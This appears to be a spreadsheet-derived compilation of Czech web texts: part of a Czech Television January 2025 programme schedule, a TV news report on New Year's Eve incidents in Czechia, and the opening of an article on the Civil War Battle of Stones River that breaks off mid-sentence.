Itálie (8.1. – 12.2.) - https://www.ceskatelevize.cz/porady/15835198579-stanley-tucci-a-vsechny-chute-italie/ středa 22:40 Stratosférický letoun Stratolaunch (8.1.) - https://www.ceskatelevize.cz/porady/14592130942-zazraky-techniky/222382574070016/ Zázraky techniky VI (15.1. – 19.3.) - https://www.ceskatelevize.cz/porady/14592130942-zazraky-techniky/ čtvrtek 20:00 Omán z výšky (9.1.) - https://www.ceskatelevize.cz/porady/14550087451-oman-z-vysky/ Finsko z výšky (16.1.) - https://www.ceskatelevize.cz/porady/15400963960-finsko-z-vysky/ Krásné země z výšky IV – New York (23.1.) a Rio de Janeiro (30.1.) - https://www.ceskatelevize.cz/porady/13535931703-krasne-zeme-z-vysky/ čtvrtek 22:30 JFK: 24 hodin, které změnily svět (9.1.) - https://www.ceskatelevize.cz/porady/15730973717-jfk-24-hodin-ktere-zmenily-svet/ Knihy, které Hitler nespálil (16.1.) - https://www.ceskatelevize.cz/porady/15999014986-knihy-ktere-hitler-nespalil/ Železná lady (23.1.), Zachráněné děti (30.1.) – odkaz se objeví na webu později pátek 23:40 Válečná hra (10.1. – 14.2.) - https://www.ceskatelevize.cz/porady/15462424074-valecna-hra/ neděle 23:40 Fenomén jeans (5.1.) - https://www.ceskatelevize.cz/porady/14890428059-fenomen-jeans / Thajsko : Návrat sexuálních turistů (12.1.) - https://www.ceskatelevize.cz/porady/15869326219-thajsko-navrat-sexualnich-turistu/ Střet o novou Ameriku (19.1.) - https://www.ceskatelevize.cz/porady/15472118056-stret-o-novou-ameriku/ Osvětim : Skryté stopy (26.1.) – odkaz se objeví na webu později ZAHRANIČNÍ FILM Pondělí 20:00 Mezi supy (27.1.) - https://www.ceskatelevize.cz/porady/18171-mezi-supy/ Čtvrtek Bídníci 1/2 (2.1., 20:00) - https://www.ceskatelevize.cz/porady/870448-bidnici/292381617200001/ Rozbité zrcadlo (2.1., 21:35) - https://www.ceskatelevize.cz/porady/21977-rozbite-zrcadlo/ Cestující v dešti (2.1., 23:20) - https://www.ceskatelevize.cz/porady/16674-cestujici-v-desti/ Pátek 20:00 Bídníci 2/2 (3.1.) - https://www.ceskatelevize.cz/porady/870448-bidnici/292381617200002/ Hrbáč (10.1.) - https://www.ceskatelevize.cz/porady/16699-hrbac/ Smůla (17.1.) - https://www.ceskatelevize.cz/porady/42079-smula/ Tělo mého nepřítele (24.1.) - https://www.ceskatelevize.cz/porady/1001877251-telo-meho-nepritele/ Povídka o policajtovi (31.1.) - https://www.ceskatelevize.cz/porady/18735-povidka-o-policajtovi/ Pátek 21:50 Mrchožrouti (3.1.) - https://www.ceskatelevize.cz/porady/27122-mrchozrouti/ Požehnání smrti (24.1.), Montana (31.1.) – odkaz se objeví na webu později Sobota 20:00 3:10 Vlak do Yumy (5.1.) - https://www.ceskatelevize.cz/porady/10275230723-3-10-vlak-do-yumy/ Velký souboj (12.1.) - https://www.ceskatelevize.cz/porady/35513-velky-souboj/ Nevada Smith (26.1.) - https://www.ceskatelevize.cz/porady/42398-nevada-smith/ Neděle 21:50 Smrt čeká všude (12.1.) - https://www.ceskatelevize.cz/porady/10204162221-smrt-ceka-vsude ZAHRANIČNÍ SERIÁL Vražedná místa 1-5 (pondělí 23:30, 13.1. – 10.2.) - https://www.ceskatelevize.cz/porady/1055871776-vrazedna-mista/ Babylon Berlín IV (středa 21:50, 8.1. – 26.3.) - https://www.ceskatelevize.cz/porady/11956220175-babylon-berlin Víkendové pořady ČT2 dostupné na webu: Běžkotoulky (sobota 08:45) - https://www.ceskatelevize.cz/porady/10401441361-bezkotoulky/ Auto moto svět (sobota 11:00) - https://www.ceskatelevize.cz/porady/14081697546-auto-moto-svet/ Babylon (sobota 12:30) - Kde žiju a proč? Jedinečná dokumentární řada osudů těch, kteří nosí nálepku cizinec - http://www.ceskatelevize.cz/porady/1131721572-babylon/dily/ Historie.cs (neděle 9:20) - Přední odborníci diskutují o vybraných tématech z českých a československých dějin - https://www.ceskatelevize.cz/porady/10150778447-historie-cs/ Nedej se (neděle 12:00) - Blok občanské a investigativní žurnalistiky o životním prostředí - https://www.ceskatelevize.cz/porady/1095913550-nedej-se/dily/ Křesťanský magazín (neděle 12:30) - Radosti a strasti života víry. Magazín nejen pro věřící - http://www.ceskatelevize.cz/porady/1098528273-krestansky-magazin/dily/ Cesty víry (neděle 13:00) - Dokumenty s tematikou duchovního života a víry - https://www.ceskatelevize.cz/porady/1185258379-cesty-viry/dily/ Nedělní příběhy (neděle 18:00) - Jeseníky díky (12.1.) - https://www.ceskatelevize.cz/porady/16496133151-jeseniky-diky/ Pořady pro seniory ve vysílání ČT art v lednu 2025 s možností shlédnutí na webu ČT Pořady jsou dostupné na webu ČT až po odvysílání a některé jsou dostupné pouze určitou dobu dle zakoupené licence Pondělí Název pořadu Novoroční koncert Vídeňských filharmoniků 2025 /premiéra/ noticka Ze Zlatého sálu Spolku přátel hudby ve Vídni už tradičně zazní opět krásné a oblíbené melodie. Skladby Johanna Strausse otce a syna, Josefa Strausse , Eduarda Strausse a dalších, nastudoval a řídí Riccardo Muti . Tančí sólisté Vídeňského státního baletu. V přestávce dokument „2025 – A Strauss Odyssey“. Uvádí J. Vejvoda. Režie M. Beyer datum vysílání 6. 1. – 20:15 proklik dílů pořadu https://www.ceskatelevize.cz/porady/1033605116-novorocni-koncert-videnskych-filharmoniku/ dostupnost na webu ČT po odvysílání 28 dnů Název pořadu Quentin Blake : ilustrace mého života noticka Portrét významného britského ilustrátora, sira Quentina Blakea , jehož obrázky znají dětští čtenáři oblíbených knížek Roalda Dahla po celém světě. Hřejivý vhled do specifického umění knižní ilustrace, která se v brzké době dočká v Londýně unikátního výstavního prostoru. Dokument BBC datum vysílání 6. 1. – 22:45 proklik dílů pořadu https://www.ceskatelevize.cz/porady/14550085945-quentin-blake-ilustrace-meho-zivota/ dostupnost na webu ČT po odvysílání 2 týdny Název pořadu Temné srdce (1-4/5) noticka Ani hluboké lesy neskryjí temnou lidskou minulost. Jeden z nejúspěšnějších evropských seriálů současnosti podle skutečných událostí (2022). Hrají: C. Ch. Drakeová, G. Lindh, A. Opheimová, P. Andersson a další. Režie Gustav Möller (Ve švédském znění s titulky) datum vysílání 6., 13., 20. a 27. 1. – 23:50 proklik dílů pořadu https://www.ceskatelevize.cz/porady/15039317384-temne-srdce/ dostupnost na webu ČT po odvysílání neomezeně Název pořadu Claude Monet : světlo okamžiku noticka Dokumentární průřez slavným Monetovým dílem a pohled do míst, kde tvořil data vysílání 13. 1. – 22:55 proklik dílů pořadu https://www.ceskatelevize.cz/porady/14300622591-claude-monet-svetlo-okamziku/ dostupnost na webu ČT po odvysílání 2 týdny Název pořadu L. Janáček: Její pastorkyňa /premiéra/ noticka Operu o třech dějstvích podle dramatu G. Preissové uvádíme u příležitosti životního jubilea dirigenta sira Simona Rattla. Účinkují: C. Nylundová, S. Skelton, L. Elger, E. Herlitziusová, H. Schwarzová, Sbor a orchestr Státní opery Berlín řídí včerejší jubilant. Režie Damiano Michieletto (V českém znění s titulky) datum vysílání 20. 1. – 20:15 proklik dílů pořadu Bude doplněno dostupnost na webu ČT po odvysílání 1 měsíc Název pořadu Hans Christian Andersen: Pohádky pro svět noticka Generace dětí vyrostly na jeho příbězích. Jeho život však byl vším, jen ne pohádkou. Německý dokument datum vysílání 20. 1. – 22:20 proklik dílů pořadu https://www.ceskatelevize.cz/porady/14300308740-hans-christian-andersen-pohadky-pro-svet/ dostupnost na webu ČT po odvysílání 2 týdny Název pořadu Dáma z bytu číslo 6 /premiéra/ noticka Příběh pražské rodačky, pianistky Alice Herz - Sommerové , přeživší holocaustu, k jejímž rodinným přátelům patřil i Franz Kafka . Dokumentární film oceněný Oscarem datum vysílání 27. 1. – 22:20 proklik dílů pořadu Bude doplněno dostupnost na webu ČT po odvysílání 2 týdny Úterý Název pořadu ArtZóna /premiéra/ Název epizody + noticka Týdeník o kultuře a jejích souvislostech. Mainstream i alternativa, díla i události. Z center i z regionů. Uvádí S. Michailidis data vysílání 7., 14., 21. a 28. 1. – 20:15 proklik dílů pořadu https://www.ceskatelevize.cz/porady/12072033166-artzona/ dostupnost na webu ČT po odvysílání neomezeně Název pořadu Zlatá lýra (1-3/10) noticka Poutavě vyprávěný příběh slavného hudebního festivalu, který milovali hudebníci i fanoušci, od jeho vzniku až po neodvratný konec. Hudební cyklus (Ve slovensko-českém znění) data vysílání 7., 14. a 21. 1. – 21:10 proklik dílů pořadu https://www.ceskatelevize.cz/porady/15250806669-zlata-lyra/ dostupnost na webu ČT po odvysílání neomezeně Název pořadu Archie (1-4/4) /premiéra/ noticka Celý život hledal sám sebe. Příběh Archieho Leache , kterého celý svět znal pod jeho uměleckým jménem Cary Grant, v britské životopisné minisérii s Jasonem Isaacsem v hlavní roli (2023). Dále hrají: L. Aikmanová, J. Watkins , O. Pendergast, C. Lynch, K. Tointonová, H. Lloyd-Hughes a další. Režie Paul Andrew Williams data vysílání 7., 14., 21. a 28. 1. – 21:10 proklik dílů pořadu https://www.ceskatelevize.cz/porady/16168901125-archie/224386656410001/ dostupnost na webu ČT po odvysílání 1 měsíc Název pořadu Marian Moraru: Traspasando Fronteras /premiéra/ Název epizody + noticka Inspirativní hudební vystoupení španělského kvarteta, které v sobě netradičním způsobem spojuje balkánskou lidovou a irskou hudbu, jazz a flamenco data vysílání 7. 1. – 22:55 proklik dílů pořadu https://www.ceskatelevize.cz/porady/16300057160-marian-moraru-traspasando-fronteras/ dostupnost na webu ČT po odvysílání 1 měsíc Název pořadu Boost &amp;amp; Okho: Still Connected /premiéra/ noticka Kreativní koncert pěti španělských multiperkusionistů plný rytmů a energie data vysílání 14. 1. – 22:55 proklik dílů pořadu https://www.ceskatelevize.cz/porady/16300057552-boost-okho-still-connected/ dostupnost na webu ČT po odvysílání 1 měsíc Název pořadu Dee Dee Bridgewater na Bayfront Jazz Festivalu noticka Osobité a místy provokativní vystoupení americké jazzové zpěvačky s kapelou The Memphis Soulphony na Bayfront Jazz Festivalu v Miami v roce 2021 data vysílání 21. 1. – 22:55 proklik dílů pořadu https://www.ceskatelevize.cz/porady/14794692545-dee-dee-bridgewater-na-bayfront-jazz-festivalu/ dostupnost na webu ČT po odvysílání 2 týdny Název pořadu Galavečer GRAND Festivalu smíchu 2025 /premiéra/ noticka Slavnostní zakončení 25. ročníku GRAND Festivalu smíchu a předání cen nejlepším inscenacím komediálního žánru uplynulé divadelní sezony. Večerem z jeviště Východočeského divadla Pardubice provází Petr Vacek a Petra Janečková . Režie P. Ulrich data vysílání 28. 1. – 21:10 proklik dílů pořadu Bude doplněno dostupnost na webu ČT po odvysílání neomezeně Název pořadu Koncert symfonického orchestru RTVE /premiéra/ noticka Španělská houslistka María Dueňas přednáší Brahmsův houslový koncert D dur, Symfonický orchestr rozhlasu a televize hraje v madridské koncertní síni Teatro Monumental za řízení Joshuy Weillersteina Mendelssohnovu Skotskou symfonii data vysílání 28. 1. – 23:20 proklik dílů pořadu Bude doplněno dostupnost na webu ČT po odvysílání 1 měsíc Středa Název pořadu Novoroční koncert České filharmonie 2025 /premiéra/ noticka Přímý přenos první letošní hudební události z pražského Rudolfina. Program ve znamení francouzské „belle époque“ diriguje Tomáš Netopil , v sólových partech se představí houslista Josef Špaček a violoncellista Ivan Vokáč . Večerem provází Marek Eben . Režie T. Šimerda datum vysílání 1. 1. – 20:15 proklik dílů pořadu https://www.ceskatelevize.cz/porady/14589927633-novorocni-koncert-ceske-filharmonie/ dostupnost na webu ČT po odvysílání 1 týden Název pořadu Jiří Tichota : Zdál se mi sen noticka Dokumentární portrét zakladatele, textaře a zpěváka legendárního Spirituál kvintetu (2017). Kamera M. Šec. Režie V. Polesný data vysílání 1. 1. – 22:15 proklik dílů pořadu https://www.ceskatelevize.cz/porady/11899422179-jiri-tichota-zdal-se-mi-sen/ dostupnost na webu ČT po odvysílání neomezeně Název pořadu Cimrmani zblízka noticka Dokument o Divadle Járy Cimrmana prostřednictvím kamery herce Marka Šimona, který své kolegy a přátele několik let neúnavně natáčel v zákulisí, na zájezdech i výletech mimo divadelní prkna. Stejně tak ve chvílích nenávratných odchodů dlouholetých členů souboru i optimistických příchodů mladších herců, kteří se pomalu stávají jeho stabilní součástí. Režie F. Nesládek a M. Šimon datum vysílání 8. 1. – 20:15 proklik dílů pořadu https://www.ceskatelevize.cz/porady/16032771279-cimrmani-zblizka/ dostupnost na webu ČT po odvysílání neomezeně Název pořadu Varhanní NEJ II (1-4/6) /premiéra/ noticka Hrát na nástroje postavené ve Smetanově síni Obecního domu, či Dvořákově síni Rudolfina patří k nejprestižnějším příležitostem koncertních varhaníků. Úvodní díl druhé řady cyklu, ve kterém objevujeme nejzajímavější varhany v Čechách a na Moravě . Moderují J. Polášek a M. Polášková. Režie J. Kolář datum vysílání 8., 15., 22. a 29. 1. – 21:35 proklik dílů pořadu https://www.ceskatelevize.cz/porady/15013853311-varhanni-nej/ dostupnost na webu ČT po odvysílání neomezeně Název pořadu Komenský /premiéra/ noticka Časosběrný dokument o nastudování opery Komenský hudebního skladatele Jana Jiráska, držitele dvou Českých lvů, který zítra oslaví své 70. narozeniny. Připravil B. Ludvík datum vysílání 8. 1. – 22:05 proklik dílů pořadu https://www.ceskatelevize.cz/porady/16373475446-komensky/ dostupnost na webu ČT po odvysílání 2 týdny Název pořadu Na plovárně /premiéra/ hosté+ noticka Na plovárně s Ivanem Šlapetou Rozhovor Marka Ebena s významným kameramanem. Režie J. Hojtaš Na plovárně s Marko Čermákem Rozhovor Marka Ebena s kreslířem, hudebníkem a trampem. Režie J. Hojtaš Na plovárně s Petrem Maláskem Rozhovor Marka Ebena s klavíristou a skladatelem. Režie J. Hojtaš Na plovárně se Slavomírem Lenerem Rozhovor Marka Ebena s hokejistou a trenérem. Režie J. Hojtaš data vysílání 8., 15., 22. a 29. 1. – 21:10 proklik dílů pořadu https://www.ceskatelevize.cz/porady/1093836883-na-plovarne/ dostupnost na webu ČT po odvysílání neomezeně Název pořadu Albrecht Dürer : tajemství autoportrétu /premiéra/ noticka Portrét výjimečného renesančního umělce a teoretika umění, Albrechta Dürera . Francouzský dokument data vysílání 15. 1. – 20:15 proklik dílů pořadu https://www.ceskatelevize.cz/porady/14381805666-albrecht-durer-tajemstvi-autoportretu/ dostupnost na webu ČT po odvysílání 2 týdny Název pořadu Uhde /premiéra/ noticka Portrét dramatika, kterého jeho životní příběh a postoje přivedly do disentu, ale i do vrcholné politiky. Režie P. Jurda datum vysílání 22. 1. – 23:05 proklik dílů pořadu Bude doplněno dostupnost na webu ČT po odvysílání Bude doplněno Název pořadu Petar Introvič – hanspaulské blues noticka Petar Introvič byl jednou z nejvýraznějších postav hudební scény, která vznikala v pražské čtvrti Hanspaulka koncem sedmdesátých let. Nejen jeho kapela Bluesberry vytvořila svébytnou, pražskou verzi hudebního stylu blues (2022). Režie M. Rákosník datum vysílání 29. 1. – 20:15 proklik dílů pořadu https://www.ceskatelevize.cz/porady/14258304373-petar-introvic-hanspaulske-blues/ dostupnost na webu ČT po odvysílání neomezeně Čtvrtek Název pořadu Pretty Yende a Nadine Sierra – Pařížské lehkomyslnosti /premiéra/ noticka Koncert dvou operních hvězd z díla italských, francouzských hudebních mistrů a melodií z amerických filmů (2023). Orchestr Les Frivolités Parisiennes řídí v sále Pařížské filharmonie Giacomo Sagripanti. Televizní režie Isabelle Soulardová data vysílání 2. 1. – 20:15 proklik dílů pořadu https://www.ceskatelevize.cz/porady/16207558672-pretty-yende-a-nadine-sierra-parizske-lehkomyslnosti/ dostupnost na webu ČT po odvysílání 1 měsíc Název pořadu Šumařova cesta z pódia na plátno /premiéra/ noticka Příběh světoznámého divadelního a filmového muzikálu Šumař na střeše s unikátními vzpomínkami Normana Jewisona a Johna Williamse . Americký dokument datum vysílání 2. 1. – 22:05 proklik dílů pořadu https://www.ceskatelevize.cz/porady/16206043313-sumarova-cesta-z-podia-na-platno/ dostupnost na webu ČT po odvysílání 2 týdny Náz</t>
  </si>
  <si>
    <t>62</t>
  </si>
  <si>
    <t>20250101_32_3698619322_76710a49c63342388082.html</t>
  </si>
  <si>
    <t>76710a49c63342388082</t>
  </si>
  <si>
    <t>Česko přivítalo rok 2025</t>
  </si>
  <si>
    <t>Česko přivítalo rok 2025 Moderátor Rey Koranteng : Česko přivítalo rok 2025. Oslavy byly leckde bouřlivé a nesly se ve znamení zvýšeného počtu výjezdů záchranných složek. Moderátor Lucie Borhyová : Desítky lidí skončily v nemocnicích kvůli zraněním nebo otravě alkoholem . Řešili jste rvačky i používání pyrotechniky na zakázaných místech. Moderátor Rey Koranteng : V centru Prahy rozdali policisté desítky pokut. Autor Ondřej Špalek, redakce: Klidný Silvestr doma nebo ve víru oslav? Hlavně pro mladší lidi je jasná varianta číslo dvě. V centru Prahy by moc lidí neskákalo, čeština tam totiž bylo slyšet výjimečně. Oslavy přitáhli desítky tisíc turistů z celého světa. odkud jste? Anketa: Z Ameriky . Z Pákistánu . Z Dubaje , Izrael . Je tady přelidněno. Tak jdeme jinam. Autor Ondřej Špalek, redakce: Staroměstské náměstí i okolní ulice byly narvané k prasknutí už v podvečer rozkopané Václavské náměstí bylo volnější. Úderem půlnoci ale také ožilo a se zákazem pyrotechniky si leckdo hlavu nedělal. Policejní hlášení: Porušování nařízení může být trestáno pokutou. Autor Ondřej Špalek, redakce: Aby mohli policisté porušování městské vyhlášky pokutovat, potřebovali dotyčného chytit tzv. za ruku nebo mít důkaz v podobě videa. Tito pánové to měli za deset tisíc. Je hodina po půlnoci a Václavské náměstí se pomalu vylidňuje. Někdo jde domů spát a někdo míří za další zábavou. Petr Matějček, ředitel Policie ČR, Praha : Z pohledu policie to byl jeden z nejklidnějších Silvestru, který jsme zažili za poslední léta. Autor Ondřej Špalek, redakce: Pak ale začalo případů přibývat. Šlo hlavně o rvačky lidí posilněných alkoholem . Jednu hromadnou třeba jeli policisté řešit k podniku na Smíchově . Záchranáři v Praze posilovaly na silvestrovskou noc službu. A věděli proč. Práce totiž měli víc než dost. Z téměř 350 zásahů jich přímo s oslavami souvisela rovná stovka. Sedmadvacet lidí zdravotníci ošetřili ve velkokapacitní sanitce Golem pod staroměstským orlojem. Karel Kirs, mluvčí pražské záchranné služby: Nejzávažnější případ, přesto ale úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra. Autor Ondřej Špalek, redakce: Silvestrovská noc neznamená extra práci jen pro záchranné složky, ale i pro ty, kdo zodpovídají za úklid měst. V akci byli až do rána. Moderátor Rey Koranteng : Nejvíc požárů za posledních 6 let, tak hodnotí silvestrovskou noc hasiči, kteří po celé republice zasahovali u více než tří set padesáti případů, hlavně u hořících odpadkových košů, kontejnerů či keřů v městských parcích. Velmi často šlo o požáry způsobené pyrotechnikou. Autor Ondřej Špalek: Praha , ulice s příznačným názvem Spálená. Hasiči likvidují požár na balkoně. Příčina? Prý pyrotechnika. V hlavním městě zasahovali hasiči u třiatřiceti požárů od pyrotechniky. Žádný si naštěstí nevyžádal oběti, výrazné škody nebo hodně zraněných. Vojtěch Sosna, mluvčí HZS Praha: Jednalo se o jednoduché případy typu požáry odpadkových košů, požáry odpadu, požáry porostu. Autor Ondřej Špalek: Desítky podobných zásahů měli i středočeští hasiči. Ti navíc likvidovali požáry chat, bytů, maringotky či drážního domku. Ten hořel v Kamenných Žehrovicích u Kladna . Příčina zatím není jasná, prý v něm ale přespávali bezdomovci. Po celé republice vyjížděli hasiči od osmi hodin večer do dnešních šesti ráno k 357 požárům. Za posledních šest let je to suverénně nejvíc. Lucie Pipiš, mluvčí Generálního ředitelství HZS : K prvním větším počtu požárů došlo mezi dvaadvacátou a půlnocí. Po půlnoci došlo k prudkému nárůstu počtu událostí, přičemž v průběhu prvních dvou hodiny nového roku byla četnost událostí nejvyšší. Autor Ondřej Špalek: Některé silvestrovské zásahy ale začaly už dlouho předtím. A právě ty byly největší. Desítky hasičů bojovaly s požáry dvou skladovacích hal na severu Moravy a ve Slezsku . Jedna hořela ve Frýdlantu nad Ostravicí , druhá v Horním Benešově , škody jsou milionové. Moderátor Lucie Borhyová : Teď vám pustíme několik ukázek toho, co během silvestrovské noci řešili operátoři tísňových linek. Jsou to například oznámení o agresivních opilcích a nebezpečné pyrotechnice, ale třeba i párech, které si pro intimní chvilky nevybraly právě nejvhodnější místo. Telefonáty na tísňovou linku: Mě crkají zbytky raket tady na parapet a stříleli to směrem sem. Nějaký podnapilý mladík tady stojí ve dveřích a nechce jít pryč. A my se nechceme s ním prát. Je agresivní. Děkujeme. Kolik jich tam je, těch kluků? Asi 4. Dobře. Předáme to hlídkách a přeji vám hezkou službu. Ať žije policie. Já jsem byla u pacientky a jim tam na chodbě souloží v baráku nějaký dva totálně opilý lidí a oni se docela bojí. Tak mě poprosil, bych vás mohl zavolat. Milan Pšenička , vedoucí směny operačního střediska, Policie ČR Praha : Řešíme trošičku nadstandardně věci, který se běžně neřeší a řešit budeme. Telefonáty na tísňovou linku: Jsou tam souložící. Já se omlouvám, já se musím fakt smát, je tam souložící. Hezký zbytek roku, na shledanou. Vám taky děkuji moc, na shledanou.</t>
  </si>
  <si>
    <t>20250101_320_3694427064_f0150829d939e530eb89.html</t>
  </si>
  <si>
    <t>f0150829d939e530eb89</t>
  </si>
  <si>
    <t>Nový rok utopen v krvi desetitisíců aneb bitva u Stones River</t>
  </si>
  <si>
    <t>Nový rok utopen v krvi desetitisíců aneb bitva u Stones River 01. 01. 2025 kategorie: Vojenská historie 0 bez komentáře Zatímco přechod ze starého roku do nového vnímáme většinově pozitivně, během americké občanské války bylo jen málo příležitostí k radosti, zvláště bavíme se o roce 1862. V posledním dni roku 1862 se totiž střetly desetitisíce vojáků Unie a Konfederace v jednom z nejděsivějším střetnutí americké občanské války. Bitvě u Stones River v Tennessee . Za setmění 31. prosince 1862 si konfederační generál Braxton Bragg zapsal „Bůh nám nadělil vítězný nový rok.“ Jednalo se ovšem o předčasné prohlášení. Jak se rok 1862 blížil ke svému konci, stával se krvavější. Síly Konfederace zůstávaly v defenzívě a síly Unie se snažily využít iniciativy k postupu. 1. ledna 1863 měla vejít v platnost Lincolnova Proklamace 95, která zajišťovala všem černochům, kterým se podaří uprchnout z Jihu, naprostou svobodu. Lincoln chtěl tuto proklamaci podtrhnout vítězstvím, a tak ke konci roku 1862 rozkázal vyrazit do útoku. Na východním bojišti měl generál Ambrose Burnside zasadit drtivou ránu a zničit hlavní armádu konfederace pod vedením Roberta E. Leeho. V polovině prosince byl ovšem Burnside drtivě poražen u Fredericksburgu a jeho podřízení byli na hranici vzpoury. Na západním bojišti měl Ulysses S. Grant obsadit hlavní baštu Vicksburg v Mississippi a i přes menší vítězství u Fort Henry, Fort Donelson, Shiloh, Corinth a Perryville, se mu hlavní úkol splnit nepodařilo. Foto: Bitva u Stones River . Vlevo v sedle je Rosecrans, který vydává rozkazy z přední linie | Wikimedia Commons / Public domain Psali jsme: Bitva u Mogersdorfu: Nevyužité vítězství habsburské monarchie ve válkách s Turky Lincolnova poslední naděje na vítězství ležela rovněž na západním bojišti, a to v armádě Cumberlandu . Po vítězné bitvě u Perryville v Kentucky byla armáda Cumberlandu v relativně dobré formě, v roce 1862 totiž více pochodovala, než bojovala. Unie měla pod kontrolou celé Kentucky a většinu západního Tennessee . 24. října generál Henry Halleck nařídil generálu Williamu Rosecransovi co nejdříve vytlačil konfederační síly generála Bragga z Kentucky a Tennessee a obsadil železniční uzel v Chattanooga . Převzal tak velení armády Cumberlandu od generála Dona Buella. Starý Rosy, jak Rosecransovi přezdívali jeho vojáci, měl tehdy 43 let a byl mohutné postavy a měřil 6 stop (182 cm). V té době se ale jednalo o poměrně neznámého generála, který sice vedl své vojáky do vítězné bitvy o Korint , jeho nedostatek agrese ale nevytvářel příliš mnoho důvěry v jeho bojové schopnosti. Rosecrans jako jeden z mála také nebojoval v americko-mexické válce. Jeho styl vedení byl také poměrně zmatečný. Byl tvrdým alkoholikem a dokázal se rychle rozhněvat, ale také rychle odpouštět. Před bitvou byl zalezlý ve svém stanu a stal se z něj pečlivý stratég a plánovač upřednostňující manévrovatelnost před přímou konfrontací, když však došlo ke střetu, rozhořela se v něm bojovnost a krvelačnost a rád velel přímo z pole. Rosecrans byl s armádou Cumberlandu opatrný, místo boje usoudil, že se musí armáda reorganizovat a doplnit zásoby. Místo vyražení do boje zůstala armáda až do prosince v Nashvillu . To se nelíbilo generálu Halleckovi , který Rosecransovi nařídil okamžitý postup. Ten to ovšem odmítl. Navdory tomu, že armáda spíše pochodovala, než bojovala, bylo vojsko unavené a téměř bez zásob proviantu. Foto: Generálové Rosecrans a Bragg – soupeřící generálové v bitvě u Stones River | Wikimedia Commons / Public domain Naproti tomu armáda konfederace pod velením generála Bragga byla v opačné situaci. Generál Braxton Bragg byl velice nesympatický, tvrdohlavý, vznětlivý, paranoidní a přehnaně reagoval na kritiku. Ve svém velitelském kruhu tedy nebyl příliš oblíbený, ve skutečnosti jím všichni jeho velitelé opovrhovali. Prakticky jediným Braggovým přítelem byl jižanský prezident Jefferson Davis , se kterým se znali od války v Mexiku . V soukromí měl ovšem Davis z Bragga obavy, dostávaly se totiž k němu stížnosti jeho podřízených, ve kterých se psalo, že Bragg ztratil rozum a rozvahu, podle jiných byl prostě jen neschopný. Koncem října, když Braggovi podřízení plánovali proti němu puč, zavolal Davis Bragga do Richmondu . I když si byl vědom, že ho podřízení nemají rádi, před Davisem se choval skromně a pokorně. Při vysvětlení, proč před armádou Cumberlandu u Perryville ustoupil a ztratil tím Kentucky, oponoval tím, že sice ustoupil, ale nepříteli způsobil ztráty 25 000 mužů (což byla lež) a přitom udržel svou armádu bojeschopnou. Bragg dále tvrdil, že vzhledem k porážkám vojsk Konfederace v Mississippi byla jeho armáda jedinou skutečně bojeschopnou konfederační jednotkou na západním bojišti. Davisovi navrhl řešení. Místo defenzívy navrhl svou armádu přemístit více na sever do Chattanoogy a založil by novou základnu v Murfreesboro , asi 30 mil jihovýchodně od Nashvillu . Odtud by zaútočil na Rosecranse, vyhnal by ho z Nashvillu a výrazně tak ohrozil zadní voj Grantovy armády v západním Tennessee . Tento druh ofenzivního myšlení se Davisovi líbil a přislíbil Braggovi svou podporu. Po návratu do Tenessee nařídil generál Bragg svému veliteli, generálu Johnu Breckinridgeovi , aby přesunul svou 6000 jednotku do Murfreesboro a zřídil tam velení. Toho dosáhl 28. října, ale obával se, že jakmile Rosecrans zjistí, jak malá je jeho síla, zaútočí a jeho jednotky rozdrtí. Naštěstí pro něj byl Rosecrans zaneprázdněn reorganizací armády, a i když viděl, že se Breckinridge přesunuje do Murfreeboro, neudělal nic. Psali jsme: Váleční sloni v čínských armádách Jak čas plynul, Braggovi se hromadily problémy. Jeho muži potřebovali zimní oblečení,jídlo i jiné zásoby, což bylo ale obtížně sehnatelné na konci podzimu. Začátkem prosince pak přišla další ráda. Prezident Davis z Braggovy armády převedl 9 000 mužů do armády generála Johna Pembertona ve Vicksburgu . Braggova armáda tak činila pouhých 40 000 mužů, zatímco Rosecransova armáda Cumberlandu měla 80 000 vojáků. O špatné situaci v Konfederační armádě Rosecrans věděl, díky jeho tajným službám dokonce věděl, že bylo 9 000 vojáků odveleno do Vicksburgu . Navíc se dozvěděl, že z Braggovy armády se odtrhla i kavalérie Johna Hunta Morgana a legendárního „čaroděje v sedle“ Nathana Bedforda Forresta. Rozhodl se tedy, že s příští dodávkou zásob na Bragga zaútočí. Foto: Boje byly mimořádně krvavé. Půda totiž nevsakovala krev a ta se soustředila do louží a tůní. | Wikimedia Commons / Public domain Na Štědrý den Rosecrans svolal štábní poradu, aby představil plán, který on a generál George Thomas vypracovali. Armáda Cumberlandu měla k Murfreesboro přijít ve třech směrech. Čelním směrem měla po linii Nashville - Turnpike - Murfreesboro přijít armáda generála Thomase Crittendena, zatímco by generálové Alexander McCook a George Thomas postupovali po jeho pravici. Unijní síla měla činit pouhých 44 000 mužů, čímž Rosecrans neúmyslně zvrátil misku vah v Braggův prospěch. Zbytek armády měl zůstat v Nashvillu . Zatímco Rosecrans oznamoval svůj postup, v táboře Konfederace se šířila vánoční nálada. Důstojníci i vojáci protancovali celou noc, alkohol tekl proudem, pořádaly se večírky a bály a nikdo žádný útok neočekával. Ráno 26. prosince se udá incident, který ještě více uvrhl Bragga do nemilosti jeho podřízených a velitelů. Bezpochyby jedním z nejlepších Braggových velitelů byl John Breckinridge . Breckinridge pocházel z Kentucky a také velel brigádě rodilým kentuckyanů, kteří tvořili většinu Braggovy armády. Breckinridge, stejně jako další vojáci z Kentucky nelibě nesli stažení z Kentucky a Bragg mezi nimi nebyl nikterak oblíbený. Bragg se netajil tím, že pohrdá Breckinridgem i jeho brigádou, které se začalo přezdívat „Brigáda sirotků“, jelikož bylo Kentucky v rukou Unie. 20. prosince Bragg svolal stanný soud, aby projednal případ týkající se obvinění z dezerce vznesených proti vojínu Asa Lewisovi z 6. pěšího kentuckého pluku. Ten dezertoval díky nesrovnalostem v papírech, aby se postaral o svou rodinu. Breckinridge a jeho důstojníci prosili Bragga , aby chlapci prokázal milost, vzhledem k tomu, že jeho otec zemřel a Lewis byl nyní jediným mužem v rodině. Bragg ovšem nevyhověl a den po Vánocích nechal Lewise popravit. Foto: Postavení obou armád na začátku střetnutí | Wikimedia Commons / Public domain Naštěstí pro Bragga generál Joseph Wheeler a jeho kavalérie odhalila postup vojsk Unie a Bragg narychlo zformoval obranu. Zmátly ho ale tři proudy postupu a nevěděl, z jakého směru přijde hlavní útok. Svou armádu tedy rozdrobil mezi všechny přístupy k Murfreesboro z Nashvillu Jeho armáda tak byla velice rozdrobena v ne nejvýhodnějších pozicích a bez zajištěné hloubkové obrany. Navíc počasí bylo prostě hrozné. Byla zima a vítr, vytrvalý déšť, který občas 